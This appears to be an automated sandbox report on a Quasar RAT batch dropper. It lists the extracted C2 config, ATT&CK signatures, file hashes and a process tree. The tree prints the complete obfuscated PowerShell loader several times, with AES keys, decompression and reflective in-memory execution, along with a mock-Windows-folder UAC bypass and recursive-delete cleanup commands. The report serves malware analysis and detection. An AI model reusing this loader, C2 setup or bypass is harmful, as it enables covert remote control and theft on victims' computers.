Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11-11-2024 02:32

General

  • Target

    67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat

  • Size

    535KB

  • MD5

    b9e1a4ea5f3b3fd0b0394183365edf8b

  • SHA1

    79bec6a406682c1385ba71a62e70b5744de0fb76

  • SHA256

    67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86

  • SHA512

    132bcd79be79e2b2fb6319d25f9ae89fc8bda65c9872792181b270cd31ad43998c1a34319e9d2f66e7bf3f035428231644d3c253e6eb1ae30095b64a702cf969

  • SSDEEP

    12288:jdnWhmK+sUu8PzDo84iBk1XZq51gzyqS996PxMdGos+Rcxdj:9WhmFsJ848Zk9KyMdGL+Y5

Malware Config

Extracted

  • Family
    quasar
  • Version
    1.4.1
  • Botnet
    Office04
  • C2
    walkout.ddnsgeek.com:8080
  • Mutex
    27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes
  • encryption_key
    6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117
  • install_name
    Client.exe
  • log_directory
    Logs
  • reconnect_delay
    3000
  • startup_key
    Quasar Client Startup
  • subdirectory
    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell with its display window hidden.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4064
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('iZqoW2CsAJeY9D83aLEj+3rxJ2t2B3ify+RUYbhDZLc='); $aes_var.IV=[System.Convert]::FromBase64String('HqkR8+zl0nkre/D9VtHffg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$cFfgm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$eBtZT=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$Baxky=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($cFfgm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $Baxky.CopyTo($eBtZT); $Baxky.Dispose(); $cFfgm.Dispose(); $eBtZT.Dispose(); $eBtZT.ToArray();}function execute_function($param_var,$param2_var){ IEX '$UGiVy=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$iInyN=$UGiVy.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$iInyN.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$rrktb = 'C:\Users\Admin\AppData\Local\Temp\67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86.bat';$host.UI.RawUI.WindowTitle = $rrktb;$zVxza=[System.IO.File]::ReadAllText($rrktb).Split([Environment]::NewLine);foreach ($vxMZN in $zVxza) { if ($vxMZN.StartsWith('SkRmYQdHVSEYUqjPEfjK')) { $uwpGR=$vxMZN.Substring(20); break; }}$payloads_var=[string[]]$uwpGR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function 
([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:3636
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        2⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2884
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3512
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3464
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 
'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3684
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4652
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2280
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4940
          • C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1048
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:632
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3616
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('iZqoW2CsAJeY9D83aLEj+3rxJ2t2B3ify+RUYbhDZLc='); $aes_var.IV=[System.Convert]::FromBase64String('HqkR8+zl0nkre/D9VtHffg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$cFfgm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$eBtZT=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$Baxky=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($cFfgm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $Baxky.CopyTo($eBtZT); $Baxky.Dispose(); $cFfgm.Dispose(); $eBtZT.Dispose(); $eBtZT.ToArray();}function execute_function($param_var,$param2_var){ IEX '$UGiVy=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$iInyN=$UGiVy.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$iInyN.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$rrktb = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $rrktb;$zVxza=[System.IO.File]::ReadAllText($rrktb).Split([Environment]::NewLine);foreach ($vxMZN in $zVxza) { if ($vxMZN.StartsWith('SkRmYQdHVSEYUqjPEfjK')) { $uwpGR=$vxMZN.Substring(20); break; }}$payloads_var=[string[]]$uwpGR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 
'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:4448
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3164
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5016
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3500
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', 
'/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:3440
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:3024
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3808
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4712
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 1068
              5⤵
              • Program crash
              PID:4712
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4900
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1048 -ip 1048
      1⤵
        PID:4044

Network

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        1KB

        MD5

        938ffc2cba917b243d86b2cf76dcefb4

        SHA1

        234b53d91d075f16cc63c731eefdae278e2faad3

        SHA256

        5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

        SHA512

        e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

        Filesize

        53KB

        MD5

        3337d66209faa998d52d781d0ff2d804

        SHA1

        6594b85a70f998f79f43cdf1ca56137997534156

        SHA256

        9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

        SHA512

        8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        19KB

        MD5

        9be396418f8f61b53dd025a7cbb90af8

        SHA1

        9a9fe3c81cea30d326d517ccb5a184255c4731e7

        SHA256

        d4b1595b904f7036e1319c156ad6fa38210750c4032ba43746976a296af277b8

        SHA512

        8a479c28b30fa64e475cf6cb976ad7909cb999407f318ff75def95d3b6e12c4ff48fcea20ad6772d150015fae1993fc63d23b235ebdce69022b80a31efd2731d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        18KB

        MD5

        6d559c8b7e31ad465a918a899cb86ac7

        SHA1

        374c95e38eb412356e6b3ad3002717ea93062d53

        SHA256

        16e9ae96042e69fd2c5dc990b5ea891a248def0783d2b3abc76dfc71296da849

        SHA512

        61ed2b1d806b1b6e3fbb2b7d9a3ea87b66fb54a402f440861941e440b57a2af78addb20c7f1abf13277febbfa6cf47f97fe0296b0e2453d89150de79bc22b6dd

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        21KB

        MD5

        f64806504ca1964c1a1070f076540d37

        SHA1

        448e45be9d1adbed680cb075f0c043359894e04a

        SHA256

        86bbd420cb6fd81ed3e2e02c6f88b5ae2ce6943db8b3a4a81500e75efa29a2d7

        SHA512

        03b0368622224df6606036280cb7726701d96b31a520b6ee4024a7560aadcfabbd7f50fdc7d8419926094231d2f6f70a7e8498e0b13f0ef7612774a2c1502ca5

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        612B

        MD5

        1e33e0ac56fc35a18763abee679e9377

        SHA1

        4a84ab19484d9a50c5433d6efa450bfbb1ce4bbc

        SHA256

        c2b21254ad76e6c6059c98ed3a2e7fb3141c284945ac5bdac33d412ac6f67480

        SHA512

        d51dfe80ad8d801ae0828580d9795c80b3610c75dce65448c1865443ea7ce5e45369c9b8048785a6590edc37f278451b30776ead7bde5a8431564a86d5d98639

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        19KB

        MD5

        ac2a5f730dceeefb451be5bca3570e5e

        SHA1

        0bc0a646168965cc00082b2c66bcf1a55117ca72

        SHA256

        03ee4f1deb5cf4e3d325ad3eb149cec7a0dc1d76bf0dc1222c673cc22bf9de4b

        SHA512

        89eb88496c4d4332689b6f80ad722b5fd36f4235e3696d695e0cc1f9a92292432f84fb3513e84e85f963231f41841163ba37a7bb18353e67bb44bf3298f405ee

      • C:\Users\Admin\AppData\Local\Temp\SC.cmd

        Filesize

        535KB

        MD5

        b9e1a4ea5f3b3fd0b0394183365edf8b

        SHA1

        79bec6a406682c1385ba71a62e70b5744de0fb76

        SHA256

        67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86

        SHA512

        132bcd79be79e2b2fb6319d25f9ae89fc8bda65c9872792181b270cd31ad43998c1a34319e9d2f66e7bf3f035428231644d3c253e6eb1ae30095b64a702cf969

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lid2mac2.3vp.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd

        Filesize

        1.6MB

        MD5

        d7239bc304b1d9d4ae192e2570419d53

        SHA1

        dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1

        SHA256

        7543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa

        SHA512

        d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430

      • C:\Windows \System32\ComputerDefaults.exe

        Filesize

        66KB

        MD5

        cfa65b13918526579371c138108a7ddb

        SHA1

        28bc560c542c405e08001f95c4ea0511e5211035

        SHA256

        4c70fea1c4f9b78955eb840c11c6c81f1d860485e090526a8e8176d98b1be3d6

        SHA512

        7ad417e862c38f1032b300735c00050435f0dd1d816e93b9a466adf3bc092be770ebf59c1617db2281c7cf982a75e6c93d927d5784132aa2c6292f3e950eca88

      • C:\Windows \System32\MLANG.dll

        Filesize

        93KB

        MD5

        dc73eb0945a5e0246479de101537c9d8

        SHA1

        b4a9d97c2c6a43944a92bc6356e9be2582918da7

        SHA256

        a1f6562dab180a4c2967eab04cf6f39e3f19c99068824230b7c32891da8aba73

        SHA512

        0bf6c18bc1bf62b3025128a419091ca3a0239bcfb519007549dfa350584890ccce30115cb9c3f72e647c3d4c142cec09bba8842e6666513f3358f2557fe96f29

      • memory/2884-21-0x0000000006FE0000-0x0000000007056000-memory.dmp

        Filesize

        472KB

      • memory/2884-0-0x0000000074CFE000-0x0000000074CFF000-memory.dmp

        Filesize

        4KB

      • memory/2884-22-0x00000000076E0000-0x0000000007D5A000-memory.dmp

        Filesize

        6.5MB

      • memory/2884-23-0x0000000007080000-0x000000000709A000-memory.dmp

        Filesize

        104KB

      • memory/2884-5-0x0000000004BE0000-0x0000000004C02000-memory.dmp

        Filesize

        136KB

      • memory/2884-117-0x0000000007560000-0x00000000075BC000-memory.dmp

        Filesize

        368KB

      • memory/2884-118-0x0000000008D60000-0x0000000008E1C000-memory.dmp

        Filesize

        752KB

      • memory/2884-3-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

      • memory/2884-39-0x0000000002270000-0x000000000227C000-memory.dmp

        Filesize

        48KB

      • memory/2884-40-0x0000000074CFE000-0x0000000074CFF000-memory.dmp

        Filesize

        4KB

      • memory/2884-41-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

      • memory/2884-42-0x00000000071E0000-0x0000000007246000-memory.dmp

        Filesize

        408KB

      • memory/2884-43-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

      • memory/2884-20-0x00000000060F0000-0x0000000006134000-memory.dmp

        Filesize

        272KB

      • memory/2884-19-0x0000000005D70000-0x0000000005DBC000-memory.dmp

        Filesize

        304KB

      • memory/2884-18-0x0000000005CC0000-0x0000000005CDE000-memory.dmp

        Filesize

        120KB

      • memory/2884-17-0x00000000057E0000-0x0000000005B34000-memory.dmp

        Filesize

        3.3MB

      • memory/2884-7-0x0000000004DF0000-0x0000000004E56000-memory.dmp

        Filesize

        408KB

      • memory/2884-6-0x0000000004D80000-0x0000000004DE6000-memory.dmp

        Filesize

        408KB

      • memory/2884-4-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

      • memory/2884-1-0x0000000002380000-0x00000000023B6000-memory.dmp

        Filesize

        216KB

      • memory/2884-2-0x0000000004FA0000-0x00000000055C8000-memory.dmp

        Filesize

        6.2MB

      • memory/3512-38-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

      • memory/3512-35-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

      • memory/3512-25-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

      • memory/3512-24-0x0000000074CF0000-0x00000000754A0000-memory.dmp

        Filesize

        7.7MB

      • memory/4652-89-0x0000000000920000-0x000000000092C000-memory.dmp

        Filesize

        48KB

      • memory/4652-94-0x0000000009E80000-0x0000000009E8A000-memory.dmp

        Filesize

        40KB

      • memory/4652-108-0x000000000A2A0000-0x000000000A352000-memory.dmp

        Filesize

        712KB

      • memory/4652-109-0x000000000DC20000-0x000000000DDE2000-memory.dmp

        Filesize

        1.8MB

      • memory/4652-110-0x000000000E410000-0x000000000EA28000-memory.dmp

        Filesize

        6.1MB

      • memory/4652-114-0x000000000EA90000-0x000000000EAA2000-memory.dmp

        Filesize

        72KB

      • memory/4652-115-0x000000000EAF0000-0x000000000EB2C000-memory.dmp

        Filesize

        240KB

      • memory/4652-107-0x000000000A190000-0x000000000A1E0000-memory.dmp

        Filesize

        320KB

      • memory/4652-93-0x0000000009F00000-0x0000000009F92000-memory.dmp

        Filesize

        584KB

      • memory/4652-90-0x00000000072B0000-0x00000000073E2000-memory.dmp

        Filesize

        1.2MB

      • memory/4652-91-0x00000000073E0000-0x0000000007704000-memory.dmp

        Filesize

        3.1MB

      • memory/4652-92-0x000000000D4A0000-0x000000000DA44000-memory.dmp

        Filesize

        5.6MB

      • memory/4712-136-0x0000000005F30000-0x0000000005F52000-memory.dmp

        Filesize

        136KB

      • memory/4712-135-0x0000000006D00000-0x0000000006D96000-memory.dmp

        Filesize

        600KB